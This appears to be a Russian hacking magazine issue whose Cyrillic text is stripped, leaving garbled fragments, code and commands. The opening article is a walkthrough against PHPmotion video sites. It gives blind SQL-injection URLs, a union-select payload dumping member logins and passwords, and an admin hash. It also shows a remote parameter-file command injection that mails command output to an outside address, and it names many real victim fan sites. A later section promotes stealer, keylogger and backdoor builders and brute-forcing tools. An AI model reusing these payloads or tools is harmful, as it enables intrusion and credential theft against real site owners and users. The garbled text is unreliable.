logo.gif logo.png, ,
2.0.
PHPmotion
3.0, ( ).
,
, VERSION.txt PHPmotion Version 2 STABLE - 28
APRIL 2008. ,
, ,

:).

PHPMOTION


./audio_selector.php:
<?php
...
$selector_audio_id = mysql_real_
escape_string($_GET['vid']);
...
X 06 /137/ 10

blind sql-injection
PHPmotion

/etc/passwd e-mail

HTTP://WWW
links
downloads.phpmotion.com/V2/PHPMOTION_PHP5.zip
PHPmotion 2.0
downloads.phpmotion.com/V3.0/php5/
phpmotion.zip
PHPmotion 3.0
snipper.ru/view/17/
phpmotion-2xratephp-blind-sqlinjection-exploit/
PHPmotion 2.x
rate.php blind sql
injection exploit
www.phpshield.com
phpShield

PHPmotion
WARNING
$selector_sql = "SELECT * FROM audios WHERE
indexer = $selector_audio_id AND approved
='yes'";
...
?>

, , , - !
union select $_GET['vid']
IDS, ,
, ,
./classes/config.php
phpShield.

, .
rate.php:
<?php
...
$rate_video_id =
X 06
4 /137
5/ 10

mysql_real_escape_string($_GET['rate_id']);
$rate_video_rating =
mysql_real_escape_string($_GET['rate']);
...
$flag_sql = "SELECT * FROM rating WHERE
video_id = $rate_video_id AND user_id =
$user_id";
$flag_query = @mysql_query($flag_sql);
$flag_count = @mysql_num_rows($flag_query);
if ($flag_count != 0) {
@mysql_close();
error_redirect(117);//"You have already
rated this video. "
}
else {
...
error_redirect(118);//"You request could
not be completed. "
}
...
?>

warning



.


.
,


,

067

IDS PHPmotion
-
), MySQL -
:
user() - samworvd_ricarda@
localhost
version() - 4.1.22-standard
database() - samworvd_video

,

PHPmotion.


./uploader_finished.php,

. :

videos.sam-worthington.net
blind SQL-:
http://site.com/phpmotion20/rate.
php?rate_id=-9+or+1=1--&rate=1 true, Location:
index.php?code=117
http://site.com/phpmotion20/rate.
php?rate_id=-9+or+1=2--&rate=1
- false,
Location: index.php?code=118

, (
).

:
1. , PHPSESSID;
2. username
admin;
3. md5-
password.


:
admin md5 21232f297a57a5a743894a
0e4a801fc3.
,
plain-text.info
,
admin :).
,
videos.

068

sam-worthington.net/siteadmin .
, , SQL-
./siteadmin/manage.php:
<?php
...
if ($_POST['search'] != "")
{
//if search
$term = mysql_real_escape_string(
$_POST['search']);
$result_sql = "SELECT * FROM
member_profile WHERE user_id =
$term ORDER BY user_name ASC LIMIT
$set_limit, $limit";
$header_title = 'Todays (new)';
}
...
?>

,

:
-9 union select 1,2,3,4,5,6,7,8,
9,10,11,12,13,14,15,16,17,18,19,
20,21,22,23,concat_ws(0x3a,user_
name,password,email_address),25,26
from member_profile/*

, ,
. , ,
file_priv
(

<?php
...
$temp_dir = $_REQUEST['temp_dir'];
// Get all the posted values from
the .param file
$_POST_DATA = getPostData(
$temp_dir, $_REQUEST['tmp_sid']);
...
foreach ($_POST_DATA as
$post_key => $post_value) {
if (preg_match("/^upfile_/i",
$post_key)) {
$uploaded_file_name =
$post_value;
...
}
}
...
function getPostData(
$up_dir, $tmp_sid) {
...
$paramFileName = $up_dir .
$tmp_sid . ".params";
$fh = @fopen($paramFileName,
'r');
...
while (!feof($fh)) {
$buffer = fgets($fh, 4096);
list($key, $value) =
explode('=', trim($buffer));
$value = str_replace(
"~EQLS~", "=", $value);
$value = str_replace(
"~NWLN~", "\r\n", $value);
...
$param_array[$key] = $value;
}
X 06 /137/ 10


./images

...
return $param_array;
}
...
@exec("$path_to_php $convertor $uploaded_file_name> /
dev/null &");// (>/dev/null & part is what sends to
background)
...
?>

temp_dir tmp_sid,

.
. , :).
1. site.com , ,
test.txt, :
upfile_=test.mp3;ls -la|mail _@gmail.
com~NWLN~id

2. PHPmotion;
3. : www.videos.sam-worthington.net/
uploader_finished.php?temp_dir=http://site.com/test.txt%00;
4.
-.
:
1. $paramFileName "http://site.
com/test.txt" (".params" - );
2. ~NWLN~ test.txt ;
3. $uploaded_file_name test.txt;
4. exec :
/usr/bin/php /home/site/public_html/phpmotion20/
convertor.php test.mp3;ls -la|mail _@gmail.
com
id> /dev/null &<

, :).
, ,
... . - -
,
- .

,
X 06 /137/ 10

httpd.conf (/usr/local/apache/conf),

( nobody).
Reverse IP www.yougetsignal.
com/tools/web-sites-on-web-server/ /etc/passwd.
,
- - .

(media.rachelmcadams.org).
/home/rachelmd/public_html/uploads/avi
- .
:
media.aguileraworld.com
media.bielfan.com
media.clive-owen.org
media.jtimberlake.net
media.kirsten-d.com
media.shialabeouf.us
media.tomcruiseforever.com
media.xfilesitalianfansite.net
tube.ultimate-avril.com
videos.a-brody.net
videos.bradpittweb.com
videos.johnkrasinski.net
videos.rene-russo.org
videos.twilightfan.fan-sites.org
www.madonnamedia.fan-sites.org
www.media.annehathawayfan.com
www.media.christian-bale.org
www.media.johnnydepp-fan.com
www.media.mattdamonfan.org
www.media.monicabelluccifan.com
www.videos.jess-alba.org

, ,
- fan-sites.
org, :).

- , , ,
,
.

. :
- ? z

069


icq 884888

X-TOOLS

: GeneratorTroj
: WINDOWS 2000/2003/XP/VISTA/7
: NOXJOKER

);
hosts (
).

-
,
exploit.in/forum/
index.php?showtopic=34995.



noxjoker.
-
( ), ,
, ,
, .
:
e-mail /
FTP;
cookies Mozilla
FireFox, Opera, IE, Google Chrome;
ICQ 6.0 QIP
Infium;

;
KeyLogger (
)
;


(:
,
,
, , );
(, ,
);
;
Remote desktop control ( , ,
IP-);
Backdoor ( ,

070

(downteam.
ru/2010/01/duvet.html).

: 1X
: WINDOWS 2000/2003/XP/
VISTA/7
:

: DUVET
: WINDOWS 2000/2003/XP/
VISTA/7
:

,
(, :).
downteam.ru
.
,
- Duvet.

, : mail.
ru, chat.ru, e-mail.ru, bigmir.net, yandex.ru,
rambler.ru, moemesto.ru, 100zakladok.ru,
vzakladki.com.ua, postquickly.ru, bookmarkwizard.ru, mylink.org.ru, tvoirod.ru, addtome.ru,
bobrdobr.ru.
:

;
antigate.com;
;
ICQ- (, bigmir.net
rambler.ru
).


downteam.
:

(, :) .
,
1x.
1x ,

.
,

,
.
. ,

email:password.
:

;
( );

antigate.com;

(simpleproxy.ru);

( , , ).
X 06 /137/ 10


:
1.
.

, (
)
.
.
2. e-mail. ,
.

, ,
.

,
, ( ,
,
,
)
.

( );
.
u.j.anger
:

;
windef;
SMTP- (
);
.

,
: http://
forum.asechka.ru/showthread.php?p=633911.

: SKYPEFLOODER
: *NIX/WIN
: INLANGER && LOGIN999

: BRUTTY
: WINDOWS 2000/2003/XP/VISTA/7
: ANGER && U.J.ANGER

Checker Antigate, ,
, antigate.
com.
login_pass.txt login;pass.

good.txt,
;; []. , , -


Skype. . , SkypeFlooder
,
Python .
:
;
;

;
, ,
;
, , , .


- , .
,
( )
grabberz.com/showpost.
php?p=278269&postcount=5.

: NOSOCKS
: WINDOWS 2000/2003/XP/VISTA/7
: RANKOR

- , .
SOCKS4-
RankoR.
:

,
Brutty

, Rankor'.

:
(~500);
;
GUI
VNC scanner;
;

Windows ( -
System);

Svchost.exe (
);
X 06 /137/ 10

,

(
,
).
GUI- ,
:
forum.antichat.ru/thread116226.html.
,
login999 exe- .

: CHECKER ANTIGATE
: WINDOWS 2000/2003/XP/VISTA/7
: ^TERIKON^
,
, - antigate.com.
?
:).
-

- ;
,
ICQ;
1080;

;
(2-5 );
3,91
( UPX, Debug-).


: forum.asechka.ru/
showthread.php?t=118622.z

071


Mifrill mifrill@real.xakep.ru

VS


,
-

. ,

,
.

, .
.
TORRENTS.RU

][

,
,
.

.
,

074
072



,

(, ).
, -
.
,
X 06 /137/ 10

IFOLER.RU ,
.
X 06 /137/ 10


. ,
, , . ,
,
,
,
.
,

-.
, torrents.ru, .

- .
2004 , torrents.ru ,
, . ,
,
, ,
.
(
), torrents.ru . , , , , , , .
, , ,
torrents.ru , ,
DDoS . ,
,
. , , torrents.ru
.
, 2007 torrents.ru .
,
( torrents.ru
Free-Torents.org Tapochek.net).
.
, ,
(
, , ),
- ,
.
, ,
. , ,
,
The Pirate Bay.
,
, , torrents.ru , ,
. , ,
, . , torrents.ru
,
100% . ,
- 2-3% (
),
,
.
, torrents.ru ? , , -

073


,
-
.
, .
,
.
,
18 2010 ,
torrents.ru,
,
torrents.ru
- (
)
. 16.02.2010.
,
,
.
, , , -
. ,
,
http://
rutracker.org. ,
, , .

074

,

,
. , , - ,
,
.
,


Autodesk. ,

.
...
,
,
,
Autodesk , Torrents.ru

.

1C ,

.
, !

,
?!,
- .
, : 26 AutoCAD
Autodesk ( ,
Autodesk!).

, , ,

1,5 .

torrents.ru ,
, (
, ,
).
, , -

, .
-
,
-

. , ? .
, torrents.
ru ,
, ,
,

.
-
EKinoT.ru. , , .


. ,
,

Torrents.Ru, ShareReactor.Ru
. ,
,
- .

IT.
eBay, Twitter,
Cisco Systems, Howcast, Edventure, Social
Gaming Network Mozilla. ,
-
.
, , ,
Twitter, , , ,
Catalys.
X 06 /137/ 10



,
. - ,
, .

.
,
,
.
, --

- .

, .
,
,
. -
, ,
.
, , p2p-
,
,

- .

X 06 /137/ 10


... ,
.
,
, ,
.
- , rutraker.org:
, - .
*.RU,
-
(
-). -
, .RU
,
. -, ,
, ,
,
.
, , ,

.
, .
rutraker.org
,
.

,

075

TORRENTS.RU ,
.
.
:
.ru
-... ).
Dreamtorrent Corp.(
) -,
.
,

-, .
,

.

IFOLDER.RU

,
, ,
.
, ,
ifolder.ru
( ,
).
RapidShare
Depositfiles ,
1,5 . .

IT- Agava.
ifolder.ru ,
-
,
/

.
rutracker.org
, , , -
.
ifolder.ru
, .

076

- .
, .
17- ifolder.
ru .
,
- Golden Telecom 2-
. . 5,
3- .
- ,
ifolder.ru
- ,
-.
,
,


,
,
. - .
,
. -
.
-


. 74 . ,
ifolder.ru ,
. ,

.
-


. ,
,
, , -
,
.
DNS- , , ,
.
? -
torrents.ru.
, ,
,
. ifolder.ru.
X 06 /137/ 10

, -
TORRENTS.RU.


. , iFolder
, ,

. ,

,
, , ,
.
, , ,
,
.
- ,
X 06 /137/ 10

.

:

,

.

,

.
-torrents.ru, ? ,
, .ru, .
, , .
, ,
happy end,

. ,
- , ,
iFolder .
(
, ).
, 19-

-
. , ...
,
ifolder.ru,
, .
19 , ,
, ,
.

:
, .
, ,
. ifolder.ru -
.
. ,
:
.
,

,
: ... , ,
,
, .
,
- , . , ,
,
.

IT- :
. . .
.
, , -
IT- -
,
, ,
?
-, ,
,
. , IT-
. z

077

UNIXOID
zobni n@gmail.com

Metadata Cluster

Clients

Object Storage Cluster

Ceph

,
, .


,
.
.
FREEBSD
8 , ULE
FreeBSD,
(http://jeffr-tech.livejournal.com)

078

FFS (Fast FileSystem) FreeBSD.



, BSD-
.
.

, -

5 10 ,
.
, , GEOM- gjournal (
FAT12)
Linux, .
X 06 /137/ 10

SDFS


Ceph


,
. -
,
. , ,
, :
1. (, , ..) inode;
2. , , ;
3. inode:_ .

. , . VFS,
, . ,

, VFS ,
.
( , , ), , fsck,
.

, , .
,
,
fsck
. : , .

,
. : -
.
,

.
. ,
, .

.
: , , ,
.

FreeBSD ,
(Soft Updates). ,

,
.
. : inode .
(, , ,
inode), , fsck
(, , FreeBSD).
Soft Updates
, fsck
,
. , , , , iXsystems,
Yahoo! Juniper networks .
(
)
, Soft Updates.
,
inode,
Soft Updates.

.

X 06 /137/ 10

SDFS

.
( ) ,

. , , . ,
, , , .

.

, .


.

079

UNIXOID

SDFS vs. Ext4 bonnie++

, ,
, :
,

Red Hat Enterprise Linux 5. ,
, 1000.
, .
, 10
, 1000
10 , 20
500 .
,
2 , . , 2 Red Hat Enterprise
Linux 5. ,
, ,
200 !
NAS
. ZFS 2009 ,
SDFS, Opendedup (www.opendedup.org).
, SDFS
. , Java
fuse (fuse.sf.net). SDFS :
1. Fuse Based File System. ,
.
2. Dedup File Engine. ,
, .
3. Deduplication Storage Engine. , . , .
Amazon S3, -.
, ,
. , , Dedup File Engine,

. Dedup File Engine (Fuse
Based File System) JNI (Java Native Interface).
Amazon S3. 8 ,
250 ,
256 , Deduplication
Storage Engine.
4 .

080

( )
-
. SDFS
,
NFS CIFS .

CEPH

Open
Source . ,

. ,
,
,
, , . ,
,
,
. Ceph,
, Linux- 2.6.34.
Ceph (http://ceph.newdream.net) ;
2006 . 2007
, fuse,
Linux. Ceph
.
Ceph :
POSIX;
;
( );
;
N-way ;
/ ;
( );
fuse-;
Linux.
, GFS, OCFS2 GPFS,

, Ceph ( ,
Lustre). , , , ,
; .
X 06 /137/ 10

Write Performance over Time

SDFS


, .
, ,
.
, (metadata server),
-,

. Metadata server
,
. , inode-,
, .
inode'
-.

metadata-,
.
Ceph,
,
, , .
,
, .

ZFS?
ZFS , Open Source,
. , ,
.
Sun Microsystems ( Oracle)
Solaris 2005 ,
. .
ZFS ,
, , , . ( , , Sun)
X 06 /137/ 10

. ZFS,
OpenSolaris, CDDL,
, , GPLv2, Linux.
, ZFS :
, ZFS
, , Linux
CDDL, ,
ZFS GPL, Sun' .
,
ZFS Linux fuse (http://zfs-fuse.net), , ZFS
. Apple
ZFS Mac OS X
ZFS 10.5 Leopard,
2009 . ,
BSD, Mac OS X,
ZFS Apple ,
Sun,
Apple.
2007 ZFS
FreeBSD. ,
, 15 FreeBSD
Solaris, ZFS.
11 2010 FreeBSD
zpool v14 ( ZFS OpenSolaris: zpool v16).
ZFS NetBSD.
Google Summer of Code 2007 (
) .
Summer of Code 2009, 2009
ZFS NetBSD.
ZFS GPL,
GRUB,
ZFS-. z

081

UNIXOID
vasilisc vasilisc777@gmail.com

Ubuntu

- ,

. Gentoo, Pygoscelis papua. ,
!
COMPIZ
Compiz X
Window System, OpenGL
3D-.
, ,
GNOME KDE.
, , ,
. ,
Compiz, ,
.
, Compiz
.
compizconfig-settingsmanager
:

082

$ sudo aptitude install


compizconfig-settings-manager

Compiz
,
:
Compiz Config.
Compiz,

, .

GTK
Ubuntu Gnome,
GTK.
, ,
.
, :

$ gedit ~/.gtkrc-2.0
### ,

gtk-menu-popup-delay = 0
###
,
gtk-menu-popdown-delay = 0
###

gtk-menu-bar-popup-delay = 0

GNOME
Gnome
MS Windows, ,
X 06 /137/ 10

KDE

CompizConfig
,

, auto_raise_delay,
:
$ gconftool-2 --type integer --set /apps/metacity/
general/auto_raise_delay 100

XML

Gnome

Gnome XML-.
gconf-editor
gconftool-2. ,
:
1. Metacity ,
:
$ gconftool-2 --type bool --set /apps/metacity/general/
reduced_resources true

,
;
2. / :
$ gconftool-2 --type bool --set /apps/panel/global/
enable_animations false

3. , ..,
:
$ gconftool-2 --type bool --set /desktop/gnome/
interface/accessibility false

4. :
$ gconftool-2 --type string --set /apps/panel/global/
panel_animation_speed panel-speed-fast
X 06 /137/ 10

XML Ubuntu
. XML , , , . XML-
. ,
: www.gnomefiles.org/app.php?soft_id=1397. (desktop-optimizations.tar.gz)
:
1. rhythmbox-quickstart Rhythmbox;
2. evolution-optimize
Evolution;
3. gnome-optimize Gnome;
4. openoffice-optimize OpenOffice.
org;
5. doc-optimize Gnome;
6. gconf-optimize Gnome (
Gnome).
, rhythmbox-quickstart
gconf-optimize .
,
.
XML ,
.
, , sudo.
,
- , ,
, . .

,
QT
, Gnome GTK, KDE Qt, GTK KDE, Qt Gnome. ! Gnome KDE ,
, .
, , Qt Gnome. , Qt'
KDE, .
KDE. ,
KDE? :

083

UNIXOID

.gtkrc-2.0

Gnome
INFO
$ sudo aptitude search '~i!~nlib(~Dqt|~Dkde)'

info


GTKPerf:
linux.softpedia.
com/progDownload/
GtkPerfDownload-6715.html

,
.

,
.
. ,
.

DVD
dvd



optimizer.sh, sqlite_
shrink.sh
rebuild_cache.sh.

084

, ('~i') ('!~nlib') Qt ('~Dqt') KDE


('~Dkde'). KDE
,
.
:

/usr/bin/kdeinit FastQt. ,
Qt-
.


PRELOAD
Preload , ,
, ,
.
preload :
$ sudo aptitude install preload

, preload . preload
, -
/etc/preload.conf .


SQLITE
Ubuntu
, ,
SQLite.

.
sqlite3
:
$ sudo aptitude install sqlite3


SQLite.
.
$ gedit ~/bin/optimizer.sh
#!/bin/sh
### Firefox
find ~/.mozilla/ -name '*.sqlite' -print -exec
sqlite3 {} "VACUUM; REINDEX;" > /dev/null 2>&1 \;
### Epiphany
find ~/.gnome2/epiphany -name '*.sqlite'
-print -exec sqlite3 {} "VACUUM; REINDEX;" >
/dev/null 2>&1 \;
### Liferea
sqlite3 ~/.liferea*/liferea.db "VACUUM;
REINDEX;" > /dev/null 2>&1
exit 0

chmod +x ~/bin/optimizer.sh
.

, .


SQLITE
SQLite-
Firefox, Epiphany RSS- Liferea.
. SQLite-
:). ?
1. sqlite3 ,
:
$ sudo aptitude install sqlite3

2. ~/bin/sqlite_shrink.sh :
$ gedit ~/bin/sqlite_shrink.sh
#!/bin/sh
find ~/ -size +100k -type f -print0 | \
while read -d '' FILE; do
abs_file_name=$(readlink -f "$FILE")
headfile=`head -c 15 "$abs_file_name"`;
if [ "$headfile" = "SQLite format 3" ]; then
file_size_do=`du -b "$abs_file_name"|cut
X 06 /137/ 10

$ gedit ~/bin/rebuild_cache.sh
#!/bin/sh
###
for d in ~/.icons/*; do gtk-update-icon-cache -f $d;
done
###
for d in /usr/share/icons/*; do sudo gtk-update-iconcache -f $d; done
###
sudo fc-cache -fv
fc-cache ~/.fonts

chmod +x ~/bin/
rebuild_cache.sh.
Gnome, ~/bin/rebuild_cache.sh,
.

vm.swappiness=10

-f1`;
sqlite3 "$abs_file_name" "VACUUM; REINDEX;" > /
dev/null 2>&1
file_size_posle=`du -b "$abs_file_name"|cut -f1`;
echo "$abs_file_name";
echo "
$file_size_do";
echo " $file_size_posle";
echo -n " "
echo "scale=2; ($file_size_posle/$file_size_
do)*100"|bc -l
fi
done
sleep 2
exit 0

3. ~/bin/sqlite_shrink.sh
chmod +x ~/bin/sqlite_shrink.sh.
4. Ubuntu ,
<Ctrl+Alt+F1>. :
$ sudo /etc/init.d/gdm stop
$ sudo /etc/init.d/kdm stop
$ ~/bin/sqlite_shrink.sh > ~/report_sqlite_shrink.txt

5. :
$ sudo shutdown -r +0

,
SQLite, . ? ~/report_sqlite_
shrink.txt, ,
. Google Chrome KDE
. ,
.

$ mkdir ~/.compose-cache

Qt/GTK , , libX11
~/.compose-cache
.

UBUNTU
. , ,
, . ,
. ,
, - . ? ,
.
, .
Ubuntu
.
vm.swappiness, 60
, , swap.
, , 40% (100-60), Ubuntu
.
vm.swappiness
10, swap,
90% (100-10).
:
$ sudo sh -c "vm.swappiness = 10" >> /etc/sysctl.conf

, swap .

GTK+ , gtk-update-iconcache, . -
(mmap()ed) ,
.
, gtk-update-icon-cache,
, . fc-cache,
.

, , / ,
.
. ,
, , ,

. , ,
. z

X 06 /137/ 10

085

UNIXOID
dhsilabs@mail.ru


Linux
,
. GPS-,
, ,
.
?
,
. carpc
:
- ;
GPS-;
;
.
:
, GPS-,

$100300.
, , .
,
,
. .

Google ,

086

. ,
,
, .
/,
10-20 ( ) .

. ,
. Carpc .
: ,
,

.
, , , .
.


,
carpc ,


.
,
. ,
,

(),

+12 220 .
:
.

, ,

, :
(
)
(,

,
),
.
X 06 /137/ 10

12 -220

- Mini-ITX

,
, ,
.
,
( ),
.
, 220 .

(). : ,
( , ), (
). .
, 220 .

: ,
. , :
$100.
.
Mini-ITX' (Mini-ITX -
, VIA
Technologies). ATX, 170170 . ?
, $80-120. , , $38.
, ,
.
, . :
,
USB-. ,
USB- .
,
(
).
Mini-ITX' .
:
( , , ),
, ( , , ). ,


-
.
Linux.
40 .
BMW (
www.bmwclub.org.ua).

X 06 /137/ 10

087

UNIXOID

InfraLinux

HTTP://WWW
links
ru.wikipedia.
org/wiki/Ubuntu_
Netbook_Remix
Ubuntu
Netbook Remix
www.ubuntu.com/
getubuntu/downloadnetbook
Ubuntu Netbook
Remix
pccar.ru ,

, ,
.
, ,
. , ,
: ,
. 1 ,
. . (
/) .
, ,
. .
3.5",
. HDD ?
.



, . :
() , , ,
, .
: , .
()
. , , .
,
.
.
, ( , )
.
, .
, ...
, .
, , ()

088

. , 100
( ,
) .
( ).
, .
,
.
.
,
.
( ).
$300.
$100-150.


, ,
, . ,
-25, ; ,
. . . ,
, TFT .
, carpc .
+30 . . ,
, . :
,

. ,
, 6, ,
+30, +24.


, , . ,
.
Windows 7
+ IGO-8.
.
Linux? carpc
,
Ubuntu .
, Ubuntu Ubuntu
Netbook Remix , . Netbook Remix
.
Netbook Remix, , InfraLinux.
Linux :
,
.
X 06 /137/ 10

tangoGPS
. ,
Ubuntu , Medibuntu
. :
$ sudo wget --output-document=/etc/apt/sources.list.d/
medibuntu.list http://www.medibuntu.org/sources.
list.d/$(lsb_release -cs).list
$ sudo apt-get --quiet update
$ sudo apt-get --yes --quiet --allow-unauthenticated
install medibuntu-keyring
$ sudo apt-get --quiet update

:
$ sudo apt-get install w32codecs

MPlayer :
$ sudo apt-get install mplayer non-free-codecs
libdvdcss2 smplayer


DVDCSS2, DVD-.
-. Linux
, . . :
cheese ( ), webcam ( - ),
camorama, camstream . , .
USB-.
,
. NetworkManager (
-), . ,
, usb_modeswitch, .
, . , .
/usr/local/bin:
$ sudo cp /media/CNU-680/Linux/RDEVCHG /usr/local/bin

/etc/sudoers:
$ sudo gedit /etc/sudoers

X 06 /137/ 10

GPSDrive
%admin ALL=NOPASSWD: /usr/local/bin/RDEVCHG

RDEVCHG .
, ,
. /etc/udev/rules.d/70-persistent-cd.
rules, :
ENV{ID_CDROM}=="?*", ENV{ID_SERIAL}=="CMOTECH_
Mass_Storage_000000000002-0:0", SYMLINK+="cdrom1",
ENV{GENERATED}="1" ENV{ID_CDROM}=="?*", ENV{ID_
SERIAL}=="CMOTECH_Mass_Storage_000000000002-0:0",
SYMLINK+="dvd1", ENV{GENERATED}="1"

:
ENV{ID_CDROM}=="?*", ENV{ID_SERIAL}=="CMOTECH_
Mass_Storage_000000000002-0:0", SYMLINK+="cdrom1",
ENV{GENERATED}="1" RUN+="/usr/bin/sudo /usr/
local/bin/RDEVCHG" ENV{ID_CDROM}=="?*", ENV{ID_
SERIAL}=="CMOTECH_Mass_Storage_000000000002-0:0",
SYMLINK+="dvd1", ENV{GENERATED}="1" RUN+="/usr/bin/
sudo /usr/local/bin/RDEVCHG"

NetworkManager
CDMA. , (mts) (internet). , .
.
Any DATA ADU-500A ( ) MTS Connect (mtsconnect.sourceforge.net).
GPS: Linux GPS-,
, ,
GPS-.
GPS-, ,
Linux.
GPS- Linux: Navit, tangoGPS GPSDrive.
Navit ,
.
. GPS- , -.
Ubuntu, .
Navit , tangoGPS GPSDrive OpenStreetMap
(www.openstreetmap.org). GPSDrive , Options
Maps Download.
. !z

089

CODING
timreset@mail.ru, javatalks.ru

POKER

ROOM
-:

-. ?
-, ,
. -,

- .
090

X 06 /137/ 10

>> coding

DVD

NEGOTIATOR

LOGIC

dvd

STATISTICS


,

, unit- ,
,
-

.

HTTP://WWW

links

, . , ,
.
,
, ,
, ,
. :
-, -, , -, , ,
//, , , .
.
Texas Holdem No Limit Poker, .

?
:
Logic (Fold, Call, Raise)
Negotiator
;
Statistics
.
Negotiator Logic
. Logic Negotiator
, (
Fold, Call Raise). Negotiator Statistics
. Statistics Logic .

, : Fold, Call, Raise. All-in


,
. : DIVAT , , (,
).
, .
X 06 /137/ 10

,
: , ,
.
,
, , , . , , - .


,
,
pokerai.org
AI,


- www.
codingthewheel.com

:
p*pot = win, p
( ), pot
,
win , ,

.
win < bet_cur, Fold

-

- (
) .
- . ?
, ,

. . , ,
.. . ,
-
.

091

CODING

bet_cur + SB > win >= bet_cur, Call (


Check)
win >= bet_cur + SB, Raise ( Bet)
bet_cur ,
( ),
, .

bet_cur:
$10,
$5, , bet_cur $15 (10+5).
SB (Small Blind) (
. .). bet_cur ,
,
. , win > bet_cur, win < bet_cur
+ SB, , bet_cur + SB.
BB (Big Blind) - .

,

.
(outs)
(odds). ,
/ .

(
win). ,
( ) , . , ,
( bet1).
, ,
( bet2).
- , . :

bet 1

win

bet2

pot


. , .
. ?
- .
. Java
JavaDoc, .
:
52 = 4 x 13 .
= < >/4 (/ ).
= < >%13 (% ).
, 10 . :

p*pot*0,91 = win

,
?
:
1) , ,
;
2)
,

( ,
, -. , -).
.
. 2.598.960 (
5 52), 10
( , 4
). , ,

( , ),
, .
.
,
.

092

isHighCard, isOnePair, isTwoPair, isSet, isStraight,


isFlush, isFullHouse, isQuads, isStraightFlush,
isRoyalFlush.

,
-1 12, -1 ,
0 12 . 0 , 1 ,
12 . .




.
,
.

X 06 /137/ 10

>> coding


1 7. ,
- ( ,
), (
).
, ,
.
, :
1) ;
2) :
,
.
sortHand (. ).
hand, .
card ( ), suite (
), suiteCount ( ).
(
).
, . ,
13. , , ,
(, )
. (
card), ( suite) ( suiteCount).

void sortHand(int[] hand, int[] card,
int[] suite, int[] suiteCount) {
for (int i = 0; i < hand.length; i++) {
for (int j = 0; j < hand.length - 1; j++) {
int t;
if (hand[j] % 13 < hand[j + 1] % 13) {
t = hand[j + 1];
hand[j + 1] = hand[j];
hand[j] = t;
X 06 /137/ 10

int getCombination(int[] hand, int[] board) {


int[] allCard;
if ((board == null) || (board.length == 0)) {
allCard = new int[hand.length];
System.arraycopy(hand,0,allCard,0,hand.length);
} else {
allCard = new int[hand.length + board.length];
System.arraycopy(hand,0,allCard,0,hand.length);
System.arraycopy(board,0,allCard,hand.length,
board.length);
}
int[] card = new int[allCard.length];
int[] suite = new int[allCard.length];
int[] suiteCount = new int[4];
sortHand(allCard, card, suite, suiteCount);
if (isRoyalFlush(card, suite, suiteCount
) != -1) {
return 117;
}
int result = isStraightFlush(card, suite,
suiteCount);
if (result != -1) {
return 104 + result;
}
result = isQuads(card);
if (result != -1) {
return 91 + result;
}
result = isFullHouse(card);
if (result != -1) {
return 78 + result;
}
result = isFlush(card, suite, suiteCount);
if (result != -1) {
return 65 + result;
}
result = isStraight(card);
if (result != -1) {
return 52 + result;
}
result = isSet(card);
if (result != -1) {
return 39 + result;
}
result = isTwoPair(card);
if (result != -1) {
return 26 + result;
}
result = isOnePair(card);
if (result != -1) {
return 13 + result;
}
return isHighCard(card);
}

}
if ((hand[j] % 13 == hand[j + 1] % 13) &&
(hand[j] < hand[j + 1])) {
t = hand[j + 1];
hand[j + 1] = hand[j];
hand[j] = t;
}

093

CODING

}
}
for (int i = 0; i < hand.length; i++) {
card[i] = hand[i] % 13;
suite[i] = hand[i] / 13;
suiteCount[suite[i]]++;
}
}

(
,
):
isHighCard
.
isOnePair
, , .
isTwoPair
, ,

.
isSet
, , .
isStraight
, . ,
.
isFlush
, , .
isFullHouse
. .
isQuads
, .
.
isStraightFlush
,
, .
.
isRoyalFlush
, , , ,
, 10, 9 . 12 (
).

,

(, ),
() , C
native .. ,
,
.

int getCombination(int[] hand, int[] board) {
int[] allCard;
if ((board == null) || (board.length == 0)) {
allCard = new int[hand.length];
System.arraycopy(hand,0,allCard,0,hand.length);
} else {
allCard = new int[hand.length + board.length];
System.arraycopy(hand,0,allCard,0,hand.length);
System.arraycopy(board,0,allCard,hand.length,

094


.
, .
2 9 . T
( 10), J , Q , K
, A . c, s, d,
h.

board.length);
}
int[] card = new int[allCard.length];
int[] suite = new int[allCard.length];
int[] suiteCount = new int[4];
sortHand(allCard, card, suite, suiteCount);
if (isRoyalFlush(card, suite, suiteCount) != -1) {
return 117;
}
int result = isStraightFlush(card, suite,
suiteCount);
if (result != -1) {
return 104 + result;
}
result = isQuads(card);
if (result != -1) {
return 91 + result;
}
result = isFullHouse(card);
if (result != -1) {
return 78 + result;
}
result = isFlush(card, suite, suiteCount);
if (result != -1) {
return 65 + result;
}
result = isStraight(card);
if (result != -1) {
return 52 + result;
}
result = isSet(card);
if (result != -1) {
return 39 + result;
}
result = isTwoPair(card);
if (result != -1) {
return 26 + result;
}
result = isOnePair(card);
if (result != -1) {
return 13 + result;
}
return isHighCard(card);
}

, ( getCombination).
118:
( 13 ),
(-, )
9x13+1=118. 12
( ),
, .

, , .
X 06 /137/ 10

>> coding

,

, .


,
, ,
.
(-) (
).
,
,
. , High card
( )
0 12, 0 High card
, 12 .
13 25, 13 , 25 .
, , (getProbabilityOfWin). : , ( )
. ,
(
) .
, 1 (,
,
1/< + 1>).
:
,
, ,
.

,

. ,
.
,
,
. ,
.
,
,

. :
, ,
, .
,
. (p*pot
= win), p pot, win
.
p
,
2,
.
,
() ()
][
(alexander@
real.xakep.ru). , ,
, ,

Texas Holdem
No Limit Poker,
. z


1) ;
2)
(
);
3)
;
4) ,
1/<
>;
5) 1-4
;
6) <-
>/< - >.

unit-,

.
X 06 /137/ 10

095

CODING
stannic.man@gmail.co

EARN
CASH
NOW!

WINDOWS:

,
Windows
.
, , ,
.

, , ,
, .
,
, ,
Windows.

096

, Windows? , ,
, , -
.
,
X 06 /137/ 10

>> coding

DVD
dvd

0xd4680000


Windows,
,
,

,
.

HTTP://WWW
links

SECTION_OBJECT_POINTER


Windows.


() ,
,
, , . -,
,
/,
. HDD .
,
,
( /
) .
, , ,
.
: ,

, . ,
128
(, ?).
,
. ,
.

.
, ,
(mapping file)
WinAPI.
X 06 /137/ 10


, ,
,
.
, , .

().
,
,
.
,

, , .
- ,

MmSizeOfSystemCacheInPages.
0x20000 , , 4 ,
512 . ,
,
Windows
,
.

Windows

www.osronline.com.
,

,



. ,
.

INFO

info

,
,

WDK
http://download.
microsoft.com


Virtual Address Control Block (VACB),
256- .

097

CODING

Windows

,
VACB. VACB CcVacbs.
- :
, VACB
. , , -

.
VACB. , , , .
,
Windows
. ..
, .
MmSystemCacheStart,
,
MmSystemCacheEnd, .
MmSystemCacheWs
. ,
. (
, )
KDDEBUGGER_DATA32. ,
,
.
CcCopyRead,
CcCopyWrite CcFastCopyRead
CcFastCopyWrite. ,
CcFastCopyRead CcFastCopyWrite
32- /
.

. ,
